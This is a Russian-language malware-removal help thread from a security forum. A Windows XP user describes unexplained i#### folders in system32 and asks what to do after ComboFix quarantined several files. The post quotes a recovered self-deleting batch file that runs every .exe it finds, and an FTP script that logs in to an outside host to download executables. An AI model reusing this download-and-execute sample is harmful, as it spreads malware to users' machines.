Работаю на win xp sp3, все обновления установлены. Также установлен последний DrWeb с брендмаузером. Доктор и его файрвол ни на что не ругаются.
Какая-то гадость создает каталоги в папке system32. Название каталога всегда формата i####, где i - буква i, а #### - четыре произвольные цифры (пример - i5095).
Появление каталогов вида i#### обнаружил adinf32, сами каталоги никогда не содержат файлов. Однако, Norton Unerase показывает наличие в этих каталогах двух стертых файлов. Файлы называются: D.bat и J
Содержание D.bat:
for %%i in (*.exe) do start %%i
for %%i in (*.exe) do %%i
del /f /q %0%
Содержание J:
open yrrpp.to.jajaca.com
Net
123
mget *.exe
bye
AVPTool (при работе в безопасном режиме) ничего подозрительного не нашел.
Будь в курсе!Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Комп простоял ночь, подкюченный к интернету, новых каталогов формата i#### не появилось. Жду указаний.
Добавлено через 2 часа 23 минуты
Combofix поместил в карантин три файла и файл реестра.
1) Что это за файлы, то есть какие программы (или, может быть, драйвера) надо переустанавливать, чтобы система работала стабильно?
2) Удалять ли файлы, который попали в карантин?
3) Как называются эти вредоносные программы?
4) Надо ли повторно запустить ComboFix?
5) Можно ли деинсталировать ComboFix и MBAM?
Добавлено через 3 часа 5 минут
Сообщение от Info_bot
поддержите проект.
Проект поддержал.
Добавлено через 1 минуту
Кто-нибудь скажите - что дальше делать?
Добавлено через 1 час 28 минут
Сообщение от thyrex
Что сейчас с проблемой?
Опять появился каталог вида i#### (i5707) в папке system32 С утра был запущен только IE8 для работы с этим сайтом и пасьянс Косынка, больше ничего не делалось.
Последний раз редактировалось sega72; 02.09.2011 в 12:36.
Причина: Добавлено
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru: